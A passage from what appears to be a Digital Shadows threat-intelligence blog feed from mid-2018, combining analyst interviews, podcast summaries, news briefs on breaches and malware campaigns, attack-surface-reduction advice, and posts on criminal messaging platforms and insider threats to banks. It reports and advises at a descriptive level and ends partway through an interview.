Although many of these targets were Russian-based banks, global banks should consider paying attention to suspicious logs that have previously been dismissed, review permissions and revoke as necessary. As always, we advocated defense-in-depth as the best form of mitigation.

Furthermore, it’s important to remember the human factor. The exposed spreadsheets of individuals in influential positions reminds us of how criminals target people, as well as technology. This information is particularly important for those individuals responsible for handling payments which make attractive targets. Organizations should ensure that privileges are reviewed and revoked if necessary.

This post details our initial findings, and we will look to be producing further analysis in the coming week.

Listen to our podcast on this topic here:

To stay up to date with the latest Digital Shadows threat intelligence and research, subscribe to our emails here.

Security Analyst Spotlight Series: Harrison Van Riper Tue, 10 Jul 2018 16:05:10 +0000 Organizations rely on our cyber intelligence analysts to be an extension of their security team. Our global team of analysts provide relevant threat research, much needed context, tailored remediation advice and managed takedown support to make our clients’ jobs easier and more efficient. Crucially, by having analysts within the intelligence and collection cycle, we’re able to minimize the real-time false positives that cause nightmares for most organizations.

In our Security Analyst Spotlight Series, we bring our analysts out of the shadows and into the spotlight, showcasing their expertise and interests so you can learn a bit more about a “day-in-the-life” of a Digital Shadows Intelligence analyst.

Name: Harrison Van Riper
Team: Strategic Research
Title: Senior Analyst

Q: How did you get into the field of cybersecurity?

A: While I was earning my bachelor’s degree in Criminal Justice, I took a cybercrime class and it was like something clicked in my head: there was this whole other side of crime that was relatively understudied, but becoming increasingly important. So, when I decided to pursue my graduate degree in Information Technology, I chose to focus on cybersecurity.

One of my professors during my graduate program introduced me to the idea of cyber intelligence analysis, and that’s when I discovered that “cyber threat intelligence” was a relatively new function that businesses and governments were incorporating, and it seemed like a natural entry point with my background.


Q: What areas of cyber security are you most interested in?

A: I’m really interested in how geopolitics affects the cyber security threat landscape, so Advanced Persistent Threat (APT) groups that are linked to nation-states fascinate me. Usually, these groups are linked with espionage activity, driven by the objectives of their respective country governments. Government entities usually receive the brunt of media coverage, but all kinds of organization could be targeted by a nation-state group; for instance, Chinese APT groups have been observed conducting intellectual property theft to support the Chinese government’s manufacturing needs. While these types of actors are most famously linked to activity against Presidential campaigns (i.e. APT-28, Guccifer 2.0 and the 2016 United States Presidential election), political entities are not the only targets.

Recently, I have been looking into cryptocurrency, researching not only how and why criminals use it, but the risks that financial services companies take on by exposing themselves to this new technology. One of our financial services forecasts we put together at the beginning of 2018 incorporated the sudden rise of cryptocurrencies and blockchain technology as well as the increased discussions regarding potential adoption by financial institutions. There are a lot of different threat vectors that exist within these areas, some of which aren’t fully understood yet even by the cybersecurity industry. But that’s why I am so interested!


Q: What has been your favorite online investigation to work on?

A: A customer came to us with a request for information regarding a publicly reported data breach. An extortion email was sent to the customer stating that as a result of the breach, the attackers had stolen several internal and confidential assets. I’ve done plenty of online investigation training, and I used these skills to analyse the email headers from the extortion letters for an IP address that was linked to infrastructure that had previously been used by a high-profile espionage threat actor. I also discovered that the usernames associated with the extortion email addresses were loosely linked to an identifiable individual through their social media accounts and other email addresses they used. From here we were able to do further profiling of the individual to determine whether they were a credible threat. That was definitely a great feeling to have a tangible and observable line of research that produced a good deliverable for a customer.


Q: What do you do outside work that helps with your job?

A: I try and stay as up to date with current events outside of the cybersecurity bubble as I can. A lot of research goes into cybersecurity reporting, but it’s important to remember that events don’t operate in a vacuum. I think it’s important to look at outside factors that could influence something like a corporate espionage campaign or a denial of service (DoS) attack – such as an increase in geopolitical tensions between states. I also try to work on my technical proficiency by improving my Maltego, Kali Linux, Wireshark skills.


Q: What’s the biggest lesson you’ve learned while training as an intelligence analyst?

A: Be comfortable with receiving criticism for your writing, especially in the beginning. The job of an intelligence analyst is to produce reports that are (usually) heavily text-based, and it would be extremely rare to get something just right on the first draft. But that’s okay! You learn from criticism. I know that I am a better writer today because of the amount of feedback of received on all my reports. At Digital Shadows the analysts all receive specific training on how to produce intelligence reports, learning about the need to be concise and, crucially, precise. Clients don’t have time to read through streams of prose trying to work out what you might be saying.

Additionally, every intelligence shop will have their own “house style guide”. Different reports will be geared for different audiences; if I’m writing a report for a security operations centre (SOC) team then the content will be far more technical than a presentation for a Chief Information Security Officer or board member. The latter are more focused on the broader, more strategic business risks, and it’s important to frame your reporting along these lines so that they see the most value in it.


Interested in hearing more from our intelligence team? Check out our blogs or subscribe to our weekly threat intelligence podcast, ShadowTalk.


Harrison Van Riper is a Senior Analyst for the Strategic Research team at Digital Shadows. He earned his Bachelor’s degree in Criminal Justice and Master’s degree in Information Technology and Management. Harrison is fascinated in the crossover between technology and crime and provides Digital Shadows’ clients with up-to-date threat intelligence.

ShadowTalk Update – 07.09.2018 Mon, 09 Jul 2018 15:28:17 +0000 In this week’s ShadowTalk, Richard Gold and Simon Hall join Rafael Amado to discuss SSL (Secure Sockets Layer) interception, a technique used to inspect HTTPS (Hyper Text Transfer Protocol Secure) traffic sent between a client and a webserver.

On 30 June, an important Payment Card Industry deadline passed that requires all websites that accept payment cards to stop supporting TLS 1.0 (Transport Layer Security). With man-in-the-middle attacks and data interception being one of the primary security concerns for TLS 1.0 and older protocols such as SSL, the pod looks into how organizations are also employing interception techniques for their own security and monitoring purposes. We’ll look into how SSL interception is done, the different reasons for deploying it, and the overall trade-offs for organizations looking to implement these methods.

Listen on iTunes:

Listen on Soundcloud:


Typeform breach signifies rising threat to data-collection companies

Data-collection and -analysis company Typeform stated that an unknown cyber-threat actor breached the company’s partial backup data, relating to client names, email addresses, employers and salaries, among other details. The breach affected a wide variety of companies and information. Personally Identifiable Information (PII) is an increasingly valuable and monetizable commodity for threat actors, who can sell it on criminal marketplaces; use it to commit fraud, such as financial theft or identity theft; or extort the company that held it. With the growing amount of data placed online by individuals, and held online by companies, data collection and aggregation companies are increasingly being targeted. In addition, new requirements set out in the EU’s General Data Protection Regulations (GDPR) mean there will simply be more breaches publicly reported.


Hamas aims malicious apps at Israel’s military forces

A new cyber campaign targeting members of the Israeli Defense Forces has been attributed to the Palestinian Sunni-Islamist organization Hamas. The attackers exploited users’ trust in the Google Play store to upload fraudulent apps. The apps either referred to the 2018 FIFA World Cup or impersonated dating and fitness apps. Once downloaded, the apps collected sensitive information stored on the devices. Hamas conducted similar attacks against the IDF in January 2017.


Database of 340 million records left exposed by Exactis

Data-marketing and -aggregation firm Exactis left exposed a database of 340 million records containing PII of 230 million United States citizens and 110 million businesses. It is not known whether malicious actors were able to gain access to this database. Such data is likely to be valuable to threat actors for targeting spearphishing and spam campaigns, as well as in general attacks, such as brute-force cracking account security questions.


RIG exploit kit uses PROPagate to deliver cryptocurrency miner

The “RIG” exploit kit has been observed using a rare injection technique called PROPagate, which abuses a Windows operating function, to deliver a variant of Monero cryptocurrency mining malware. Because PROPagate is considered a form of evasion technique, rather than a security flaw, it will probably continue to be used for malware delivery, as it is unlikely to be patched. Exploit kits are widely used to distribute variants of cryptocurrency mining malware, and this trend will likely continue for the medium- to long-term future (for three months or at least a year).


Reducing Your Attack Surface: From a Firehose to a Straw Thu, 05 Jul 2018 16:28:33 +0000 What is Attack Surface Reduction?

Attack Surface Reduction is a powerful tool used to protect and harden environments. It’s a broad term that means many things to different people. In this case, we use the OWASP definition: “attack surface describes all of the different points where an attacker could get into a system, and where they could get data out”. Using this definition, it becomes clear that the reduction of this surface is imperative. Removal of unnecessary features is a big part of this process. Why? Because features means code, which means bugs, which means vulnerabilities, which means exploits. Exploitation of vulnerable code is not the only issue; if a feature has credentials associated with it then good credential hygiene must be applied otherwise the risk of default, weak or stolen credentials becomes a major problem. It is also a regular occurrence that features end up being misconfigured, which can also result in security issues.

When discussing modern IT environments, we typically focus on networked services such as web sites, operating systems and associated applications. However, in the modern era, we also have to deal with cloud and mobile environments. In this blog, we’ll look at how each of these conspire to increase our overall attack surface, while also outlining specific tools and measures that can be used to implement an attack surface reduction program.


One of the biggest challenges with reducing the attack surface of cloud deployments is discovering that there is a cloud deployment at all! Often asset inventory systems are not fit for purpose, particularly when it comes to modern cloud features like AWS Lambdas or Azure functions. Development teams need to work with security teams when it comes to spinning up new cloud infrastructure. If API keys are being generated, then they need to be locked down to the minimal set of permissions required to get the job done.


Corporate mobile phones need to be enrolled into a Mobile Device Management (MDM) system so that they can be centrally managed for patching, visibility and application of policies. Employee personal devices can be placed into an internet-only Wi-Fi network separated from the corporate IT network. This allows employees to still access personal resources while not compromising the security of the corporate IT network.


The first step for reducing the network attack surface is to disable all services that are unnecessary. However, in order to do even this first step, it is necessary to know which IP addresses you own, which services are necessary for the business, which are available on these IP addresses, and so on. Many networks we see are locked down to only allow ports 80 and 443 through. Nonetheless, it’s worth keeping in mind that admin panels for Content Management Systems (CMS) are often available over these standard HTTP(S) ports and, similarly, configuration panels for network equipment like firewalls, VPNs, load balancers, etc. can be inadvertently exposed in this way too.

In situations where there is a limited number of IP addresses connecting to a particular service like a business-to-business (B2B) service or a Remote Desktop Protocol (RDP) service, then IP whitelisting can be an effective approach to reducing the attack surface. Obviously, this approach does not scale to consumer-to-business (C2B) services such as retail operations, which require open access.

It is worth considering here that although your network may be sufficiently hardened, connections into your environment from third party suppliers or partners can be a concern. The ACSC 2017 Threat Report states that: “As it has become more difficult for adversaries to directly compromise their targets, adversaries have sought secondary or tertiary access into primary targets”. It is, therefore, worth keeping in mind that an organization may be a target for the sole reason of their connectivity into other environments.


For hosts, such as those running the Windows operating system, there are many built-in tools that can be used to reduce the attack surface. The “hardentools” application from Security Without Borders disables many of the risky features that are part of Microsoft Windows and Office.

Figure 1: HardenTools application used to disable risky Microsoft Windows features (Source: Security Without Borders)

The tool can be used as a standalone tool or simply as inspiration for internal Group Policy Object (GPO) or other policies that can be deployed. Some of the key features it disables are:

  • Windows Script Hosting (JavaScript & VBScript), which is often used by attackers to gain code execution in an environment.
  • Macros, OLE, ActiveX and DDE for Microsoft Office, as active content is often abused by attackers.
  • Autorun/autoplay for removal media like USB sticks. Although disabling removal media entirely is preferable, there are often cases where it is the only solution for moving files between machines.

As well as the operating system and office applications, browsers are another key attack surface. Exploit kits and other drive-by download techniques are frequently used by both opportunistic and more targeted, sophisticated groups. Browser attack surface can be reduced by the following measures:

  • Disable unnecessary browser plugins such as Adobe Flash, ActiveX controls, Oracle Java applets and Microsoft Silverlight. Most multimedia is delivered by HTML5 rather than by these other formats.
  • If there is a business requirement for a particular technology or site, then whitelisting the site or technology where appropriate reduces the amount of options that an attacker has.
  • If even this is not possible, then use click-to-play, which Google Chrome – for example – supports, where there has to be explicit user interaction in order for the attacker to gain code execution.


By keeping in mind that unnecessary features are providing more options for attackers to enter an environment, an attack surface reduction program helps to increase attacker costs by denying them the straightforward methods for achieving access. Digital Shadows customers will be informed by our infrastructure incidents product feature of services listening on potentially risky external ports.

To find out more about protecting and hardening your environments, listen to our recent ShadowTalk podcast: Episode 29: Reducing Your Attack Surface: From a Firehose to a Straw.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.


ShadowTalk Update – 07.02.2018 Mon, 02 Jul 2018 15:43:25 +0000 In this week’s ShadowTalk, following news that a database containing 340 million records has been publicly exposed to the internet, Richard Gold and Simon Hall join Michael Marriott to discuss how (and why) you can reduce your attack surface.

Listen on Itunes:

Listen on Soundcloud:


Necurs botnet updates delivery payloads and evasion techniques

The Necurs botnet has received multiple updates to its delivery payload mechanism distributed from spam campaigns as well as the evasion techniques designed to circumvent mitigation solutions. According to analysis by TrendMicro, the botnet delivered the FlawedAMMYY backdoor trojan by exploiting Microsoft’s Dynamic Data Exchange (DDE) protocol. Security researchers at Cyber Security Strategists detected Necurs delivering the Ursnif banking trojan to companies in Italy, in a first for Ursnif. Ongoing Necurs activity and additional evolution of its tactics and techniques are expected in the short to medium term future.

SamSam ransomware introduces new feature to hinder analysis attempts

A new version of the SamSam ransomware has been observed in which the ransomware’s distributors must now manually enter a password in the command-line to execute the payload. This feature is unique to SamSam, and appears to have been introduced to prevent security researchers from analyzing the payload’s binary code. Thus far, several lucrative attacks have been attributed to SamSam, with future attacks considered highly likely. SamSam has been active since at least December 2015 and was recently responsible for significantly disrupting operations at Colorado’s Department of Transportation and services for the government of the City of Atlanta.

United States immigration policy attracts muted hacktivist response

The United States presidential administration’s recent “zero tolerance” immigration policy has attracted a limited hacktivist response, including claims of data leaks and denial of service attacks. However, no evidence supports assertions that targeted websites had been taken offline, and alleged leaked data appeared to be publicly available rather than sourced from a data breach incident.

Lazarus group likely responsible for Bithumb cryptocurrency exchange theft

Recent distribution of the Manuscrypt trojan via malicious Hangul Word Processor (HWP) lure documents has been attributed to the Lazarus group. Several similarities between the malware used during the June 2018 cryptocurrency theft from the South Korean exchange Bithumb and in this latest campaign, combined with references to the Bithumb theft in one Hangul lure document, may indicate the group’s involvement in the Bithumb attack.  Lazarus has previously been accused of attacks against cryptocurrency exchanges, so the targeted sector and the tactics used are consistent with their modus operandi. Although attribution has not been confirmed at time of writing, the evidence from this latest malware campaign adds credibility to the assessment that Lazarus group was likely responsible for the cryptocurrency theft.

Diversity and Digital Shadows Women’s Network Tue, 26 Jun 2018 15:08:51 +0000 If you haven’t already watched RBG – a movie about the incredible life of U.S. Supreme Court Justice Ruth Bader Ginsburg – you should. Amongst the brilliant quotes Ginsburg brings us, one sticks out: “I ask no favor for my sex, all I ask of our brethren is that they take their feet off our necks”. Gender inequality remains shockingly prevalent, and cybersecurity is far from an exception.

Last week, after months of planning, the Digital Shadows Women’s Network held its first event. It’s was a great way to share experiences and advice from a range of women in the company; from the developers who built the product six years ago, to the latest hires across the globe. The goal? To promote inclusivity and diversity to create equal opportunities within and outside Digital Shadows. With upcoming events in London, Dallas and San Francisco, I’m excited for the impact this can have.

In a recent podcast, I chatted with colleagues about our experiences in security, as well as the challenges, opportunities and future of women in security. Here’s the three areas that stuck out most for me:


1.    Progress is not quick enough

One of the top ongoing studies in this field is the Women in Cybersecurity report, published every two years. The latest 2017 report found that the global cybersecurity workforce is 11 percent female, up from 10% in 2015. That’s not a quick enough, or substantial enough change. Even the more progressive companies, such as Google, are less than a third female. This must change at a quicker rate for all levels within organizations; from interns to the board.

2.    Diversity of thought has business benefits

With a smaller pool of talent to choose from, businesses feel the strain of this inequality too. With more and more demand for an increasingly limited talent pool, having a culture that doesn’t encourage diversity puts off a sizable chunk of potential recruits.

But there’s more to it than the size of the talent pool. With different perspectives, we’re better able to address challenges differently and avoid groupthink (this is a topic I’ll be addressing in future blogs, so watch out for those!).


3.    Using gender as springboard for wider diversity

It’s important that this isn’t just about women; gender equality applies equally to males. In fact, it was encouraging to see so many males offering support for the Women’s Network.

We should also think of this as a springboard for wider diversity. “Women” in security is not a homogenous block; women of different ethnicities will typically experience different forms of discrimination than their white counterparts. For all involved, we need to be providing equal opportunities, as well as a good work life balance that allows for flexibility amid varying commitments.



To hear more of our thoughts, listen to our podcast on the Women’s Network Launch, and stay tuned for my next blog on the importance of diversity as a whole.


ShadowTalk Update – 06.25.2018 Mon, 25 Jun 2018 14:38:13 +0000 In this week’s ShadowTalk, Simon Hall and Richard Gold join Michael Marriott to discuss the merits and perils of attribution, including the number of characteristics and variables required for a strong attribution, instances where attribution has succeeded, and whether organizations should care.


In the spotlight: TG-3390 deemed responsible for watering hole attacks

A national data center in Mongolia was reportedly compromised by the Chinese state-linked threat group TG-3390 (aka Emissary Panda, APT-27, Lucky Mouse) to conduct watering hole attacks. Legitimate websites were compromised to infect their visitors’ machines with the “HyperBro” trojan. The group used an anti-detection launcher and decompressor for obfuscation, developed by penetration testing software company Metasploit.


Olympic Destroyer threat group switches target sectors

The Olympic Destroyer threat group, attributed with attacks in February 2018 on entities associated with the 2018 Winter Olympic Games, has changed its focus. Recent information-gathering attacks were observed against financial institutions in Russia and biological and chemical threat-prevention laboratories in Europe. Reporting did not specify which companies have been targeted to date. The true intentions and motives of the threat group are unknown; information gathering is often conducted as an early stage, so additional attacks attributed to Olympic Destroyer will likely be observed in the short-term future (next three months).


Financial services provider extorted following data breach

South Africa-based financial services provider Liberty Life was subjected to a data breach and extortion attempt by an unidentified threat actor. The company confirmed an individual had requested payment after alerting them to vulnerabilities affecting their systems. Liberty Life subsequently detected unauthorized access to its IT infrastructure, and the theft of sensitive information. This incident highlights a trend of financially motivated threat actors seeking reward for identifying flaws, then exploiting the flaws when payment is not forthcoming. Liberty Life has publicly stated it has no intention of meeting the payment demands.


PoC code released for Adobe Acrobat vulnerability

PoC code for a remote code execution vulnerability affecting Adobe Acrobat, CVE-2018-4990, was published to GitHub on 18 Jun 2018. The flaw was first reported as having been exploited in the wild in March 2018, alongside a Microsoft Windows privilege escalation vulnerability (CVE-2018-8120). If exploited together, the vulnerabilities allow an attacker to gain an initial foothold and bypass sandbox protection mechanisms. The publication of the PoC code is highly likely to encourage its adoption by threat actors with varying motives for other attacks in the immediate future (next few days or weeks).

How Cybercriminals are Using Messaging Platforms Thu, 21 Jun 2018 15:49:15 +0000 Alternative Ways Criminals Transact Online: A Moving Target

Last week, the cracking forum (specialized in tools for gaining unauthorized access to accounts) known as sentry[.]mba announced they were shifting their communication platform from Discord to Internet Relay Chat (IRC), a move caused by a “sudden ban wave” across the Discord platform. But why bother setting up a messaging platform in the first place? As we detailed in our latest report, Seize and Desist, such platforms offer an alternative way of transacting online and a departure from the centralized market model offered by AlphaBay and its predecessors.

In previous blogs, we’ve discussed how the takedowns of AlphaBay and Hansa have led to the adoption of new technologies, such as blockchain DNS, by cybercriminals. This blog focuses on how messaging platforms are another potential route for cybercriminals.


Figure 1: Sentry MBA Twitter account announces move to IRC network


Messaging Platforms Offer Ways to Avoid Detection

Chat networks can be utilized in a number of ways, and are certainly not mutually exclusive from the forum-based approach. Often sellers will advertise their service or product on a particular forum, but rather than communicate directly with sellers on the forum or through its private messaging service, buyers are encouraging interested parties to reach out to them directly on alternative chat networks and messaging platforms. With buyers and sellers spread widely across an increasingly decentralized community, the belief is that it will be more difficult for law enforcement operations such as Operation Bayonet to succeed again, which was facilitated by having users congregated into a single, central location such as a marketplace. There are many messaging platforms to choose from, including Discord, Skype, Jabber, and IRC, but the most popular is Telegram. While these platforms pre-dated the takedowns of AlphaBay and Hansa, actors have increasingly turned to them to transact online.


Popularity of Telegram Continues to Grow

Of all the messaging platforms, it’s Telegram that appears to be experiencing the most growth, with over 5,000 Telegram links shared across criminal forums and dark web sites over the past six months. Of these, 1,667 were invite links to new groups. These covered a range of services, including cashing out, carding, and crypto currency fraud. Within these Telegram channels, sellers post advertisements of their products and services as they would normally do on a marketplace or forum.

One such example is the OL1MP marketplace, a Telegram-based marketplace that provides cashing out services. Cashing out is a way to monetize stolen payment card information. Users can easily select the type of good or service, like drugs or vacations, they wish to purchase with their stolen cards. OL1MP ties in this automated effort with a human touch. As with most marketplaces, reviews are important for attracting new customers. In fact, extra discounts are available for those individuals who post pictures and positive comments from their carded vacations.


Figure 2: OL1MP Telegram channel


In the same way as Tor and I2P are not inherently criminal, nor are messaging platforms. Rather, criminals benefit from the added trust provided by the platforms. While this is an ongoing trend that pre-dates Operation Bayonet, it is yet another example of how criminals have shifted away from the concept of a centralized marketplace. Organizations who wish to track criminal activity online should consider messaging platforms alongside the more traditional forums, message boards and dark web marketplaces.

To find out more about how cybercriminals are shifting away from the marketplace model towards alternative channels, download our report Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age.

To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Five Threats to Financial Services: Part One, Insiders Tue, 19 Jun 2018 15:09:41 +0000 The sensitive and financial data held by banks and financial institutions, as well as their centrality to national infrastructure, makes them an attractive target for cybercriminals and hacktivists. In this blog series, we’ll be shining the light on some the latest tactics and techniques used as part of insiders, banking trojans, phishing campaigns, and payment card fraud. In future posts, we’ll also peer beyond the cybercrime world to understand if hacktivism poses a viable threat to the financial sector. Let’s start with insiders.

Criminal forum discussions

It’s not uncommon for insiders to offer their access and information across dark web and criminal sites. These discussions include users asking about the best places to sell insider information, others asking where it can be found, individuals claiming to sell insider access, and other users attempting to recruit insiders. It’s something that we will alert our customers to (read the our insider use case for more information). The site Intel Exchange (Figure 1), for example, has a dedicated section for insider information discussions. Similarly, Figure 2 illustrates an individual selling insider access to a large mortgage company.


Figure 1: Insider information discussion board on Intel Exchange site


Figure 2: Posts made by user offering insider access to mortgage company


Keyword searches across our dark web spider coverage over only the past six months returned 8,425 mentions of insider trading keywords and phrases on our tracked sites. This data and supplementary manual searches indicate there is substantial interest in insider trading within the online criminal ecosystem.

For example, back in February 2017, an AlphaBay forum (when the site was still operational) user named “asad1199” made multiple posts to the forum claiming to have access to a Society for Worldwide Interbank Financial Telecommunications (SWIFT) payment gateway and sought experienced users to help them monetize it.


Figure 3: Post made to AlphaBay forum by user asad1199 offering SWIFT access


The user claimed to possess “data” that provided full administrator access to this system. The posts claimed that asad1199 would provide information as to where SWIFT transfers should be sent and offered to provide any potential partners with 10-20% of any profits in exchange for their services.  

This user had previously added similar posts to the “Wanted” section of AlphaBay claiming to have access to an Automated Clearing House (ACH) system at a logistics company and an automobile dealership in the United States. In these posts the user offered a bank drop service wherein they would receive payments and then transfer to another account specified by the customer, charging 50% commission.

Specialized insider marketplaces on the dark web

Despite these examples, the most valuable insider information is not typically advertised openly online. Insider access is often a very case-based and demand driven process that is not well suited to online marketplace or forum models.

Those with privileged access or information will most likely conduct their business in person to avoid raising the suspicions of law enforcement. Large datasets containing personally identifiable information or credit card details, on the other hand, are more easily monetizable and likely to be shared and sold across online forums and marketplaces.

Exclusivity and a level of closed- or limited -access is significant in the trade of insider access on cybercriminal locations. Insider information only remains valuable while access to it is limited to a small, restricted and trusted group, hence why specialist dark web sites such as The Stock Insider (Figure 4) and KickAss (Figure 5) have ostensibly developed access restrictions to maintain the appearance of legitimacy. Moreover, these restrictions also provide inside sources and buyers with a level of perceived protection as they will feel their identities are less likely to be exposed or compromised by having too many members in these networks.


Figure 5: Stock Insiders forum homepage



Figure 6: KickAss marketplace homepage advertising insider trading


Of course, we should take these forums with a pinch of salt. The focus on insider trading on KickAss has since been scaled back and the site appears to now cater to a more general criminal community. Threads on other criminal forums and Reddit pages also regularly claim that KickAss is a scam and users were not receiving valid insider trading tips for the membership fee. Membership of the forum requires a monthly fee of 0.25 BTC.

How to Detect Insiders: Don’t Hyper Focus on the Dark Web

Sites like KissAss and The Insider are illustrative of the interest in insider trading across the dark web and criminal forums. However, you shouldn’t hyper focus on these sources alone. Organizations should start on the inside, implement the principles of zero trust, know where your toxic data resides, and understand how an insider would monetize that data. Once you have understood this, you can:

  1. Monitor the open, deep, and dark web for mentions of your brand and toxic information.
  2. Work with legal teams to determine the appetite for purchasing items and services sold by potential insiders on criminal forums and market places.
  3. Purchase or use a third party to acquire items and services sold by potential insiders.
  4. Conduct investigations on recruiters and the sellers of goods and services. For example: history of individual, reputation of individual, OSINT research, gathering meta data where possible to aid in investigation.
  5. Don’t forget about the accidental insider; the chances are that you are more likely to have someone send toxic data in a spreadsheet to a third party than to have a malicious insider selling the keys to your kingdom.

Stay tuned for our future blogs on other threats to financial services.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

ShadowTalk Update – 06.18.2018 Mon, 18 Jun 2018 15:34:31 +0000 In ShadowTalk this week, Dr Richard Gold and Simon Hall join Rafael Amado to discuss misconceptions around vulnerabilities and exploits, other techniques for gaining code execution, and how organizations can prioritize the patching of vulnerabilities.



Banco de Chile attackers used wiper malware to obfuscate theft

Fresh analysis of Banco de Chile’s reported 24 May 2018 cyber attack has shed light on the initial tactic, which disrupted online, in-branch and telephone banking services to obfuscate the theft of approximately USD 10 million. The attackers apparently used destructive malware potentially connected to the “Buhtrap Group”, a cyber threat group active between 2015 and 2016. That group formerly targeted financial institutions to conduct financial fraud. However, the Banco de Chile attack cannot be definitively attributed, as the “Buhtrap” malware was publicly released in February 2016. Multi-stage attacks that use disruptive and destructive malware to obfuscate or distract from financial theft will likely continue, as will the exploitation of interbank communication systems for financial gain.


Sensitive data on U.S. Navy projects exposed

Chinese state-affiliated threat actors reportedly stole 614GB of sensitive data from the United States Navy by exploiting an unclassified network a contractor used in January and February 2018. The stolen data included information on active United States military projects, signals and sensor data, cryptographic systems and an electronic warfare library for the Navy’s development unit. No technical details are currently available, nor could the breach be definitively attributed; however, the type of data exfiltrated would likely be attractive to nation-state actors, or China-linked groups that have previously conducted targeting with objectives similar to this campaign. Contractors’ access to sensitive data will likely continue to present a threat to government and military entities.


UrSnif trojan targets U.S. and Canada

A campaign using tax-related phishing lures to deliver the “URSnif” banking trojan to bank customers in North America has been identified. Victims were tricked into accessing a URL for more information on overdue taxes. Visiting this URL prompted a download of a ZIP file that contained UrSnif, and checked for the presence of anti-virus products on the victim’s system. The URL was only accessible from IP addresses in the United States and Canada, and research into the sample injection payload indicated that the malware affected only victims who were customers at North American banks, demonstrating that this was a targeted campaign. UrSnif has been widely used since the release of its source code in 2010, and has been aimed at the finance, retail, shipping and manufacturing industries. It will likely continue to be used across a variety of campaigns. Similarly, threat actors are likely to continue to use the North American tax seasons to simulate legitimate communications.


Dixons Carphone reports customer data breach

On 13 June 2018, United Kingdom electronics retailer Dixons Carphone reported a data breach that compromised 5.9 million of its customers’ cards and 1.2 million of customers’ records, which contained personally identifiable information (PII). Although most of the cards had Chip and PIN protection, approximately 100,000 were vulnerable and may be used for financial fraud or sold on criminal forums. Moreover, customers’ exposed PII may be used for a variety of malicious purposes, including social engineering and phishing.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Security Analyst Spotlight Series: Rafael Amado Thu, 14 Jun 2018 16:27:42 +0000 Organizations rely on Digital Shadows to be an extension of their security team. Our global team of analysts provide relevant threat research, much needed context, tailored remediation advice and managed takedown support to make our clients’ jobs easier and more efficient. Crucially, by having analysts within the intelligence and collection cycle, we’re able to minimize the real-time false positives that cause nightmares for most organizations.

In our Security Analyst Spotlight Series, we bring our analysts out of the shadows and into the spotlight, showcasing their expertise and interests so you can learn a bit more about a “day-in-the-life” of a Digital Shadows analyst.


Name: Rafael Amado
Team: Strategy and Research
Title: Senior Strategy and Research Analyst

Q: What sparked your interest in cyber security and intelligence?

A: I took a less-direct route into the industry, coming from a political economy and policy background. As a predoctoral researcher I focused on military and intelligence relationships during the Cold War, particularly between western nations and those undertaking economic liberalization policies. While working in public policy, I realized there’s a widening knowledge and generational gap between current policy makers and the issues facing the modern world. One of these is technology, and in the realm of international relations where my primary interests lie, the realities of cyber security and cyber warfare are, in general, very misunderstood. I therefore decided I could contribute a lot more to the policy debate in future if I had a strong cyber security background from working several years in the industry.


Q: What areas of research do you focus on?

A: My research areas are very varied, and I’ve covered a lot in my time at Digital Shadows, including looking at how disinformation campaigns are carried out and facilitated by the variety of easily-accessible tools and platforms available online. This research came off the back of the U.S. election activity in 2016, and we were keen to demonstrate how disinformation – which is not a new phenomenon by any means – is more than simply a political issue and affects business as well. Threat actors knowingly spread misleading information for reasons other than politics – for example financial gain or prestige.

Other areas I’ve been heavily involved in include the evolution of cybercrime and threats to major sporting events. Given my language capabilities, I worked closely with sponsors and organizers of the 2016 Olympic Games in Rio de Janeiro, Brazil, to develop monitoring plans for a wide range of threats affecting events of this scale. This included hacktivist activity against government organizations and sponsors, as well as financial crime affecting visitors to Brazil. My area studies knowledge and language capabilities were very useful here to make sense of the very distinctive Brazilian criminal ecosystem, which meant cybercriminals developed bespoke malware and phishing techniques to achieve their goals.  


Q: You’ve recently co-authored a paper on cybercrime following the AlphaBay and Hansa takedowns. What are the most significant developments to come out of that research?

A: The main takeaway here is that the Operation Bayonet, the joint law enforcement effort to seize AlphaBay and Hansa, has not made consumers and organizations safer when it comes to cybercrime. The takedown efforts have had some noticeable effects, namely further damaging trust between users of marketplaces and criminal forums. However, cybercriminals are resourceful and determined, and they’ve reacted by moving away from the marketplace model altogether. Instead, they favour more specialized forums depending on the services they need; those wanting payment cards visit carding forums and Automated Vending Carts, while those in the market for tools and software tend to go to more technical hacking forums. From here a seller will advertise their services, before asking interested buyers to move onto one of many peer-to-peer channels to discuss business and arrange payment.

Rather than an alternative marketplace taking AlphaBay’s place, we’re seeing encrypted messaging platforms such as Telegram and Discord growing in popularity for this type of activity. I should stress that use of these platforms, as well as others such as Jabber and ICQ, pre-date Operation Bayonet, but it’s definitely where cybercriminals operating at this type of level are flocking at this moment in time.


Q: What have been your highlights working at Digital Shadows?

A: Two things stand out. The first would be the recent research paper we produced looking at file exposure through misconfigured network services such as SMB, FTP, NAS drives and S3 cloud storage, Too Much Information Misconfigured FTP, SMB, Rsync, and S3 Buckets Exposing 1.5 Billion Files. We received great feedback for this from both our customers and the wider security community. What I loved most here was joint effort that was required to produce this paper. In all honesty, writing it was the easy part. The major difficulty was building the scanning tool in the first place, and we have an incredible team of security engineers and data scientists who built this mammoth tool able to identify over 1.5 billion exposed files in just under three months. I can’t take any credit for that. The research ignited some much-needed conversation about risks emanating from your supply chain and third parties. A vast majority of the examples of exposed files we detected were a result of contractors backing up sensitive documents – such as penetration tests and security audits – on misconfigured NAS drives, but this is often overlooked when people discuss ways to secure their businesses.

The second highpoint would be my work on the WannaCry ransomware attack from 2017. While the days of the attack were stressful and hectic, when things had settled somewhat I was able to put some of my intelligence tradecraft training to use. I composed what we call an Analysis of Competing Hypotheses table that looked at the goals and objectives of the attackers behind the attack. This structured analytic technique is a great way to identify all the available data points for a given problem and then assess their relevance and the reliability of your sources. The table and accompanying blogs were a big success, being featured by SANS and reposted across various industry publications. When colleagues have had briefings with international law enforcement and security organizations around the world, the latter have commented on the strength and nuance of our analysis in that piece. Having that sort of support and recognition from industry peers is both rewarding and motivating.


Q: How do you see Digital Shadows’ research providing value to customers?

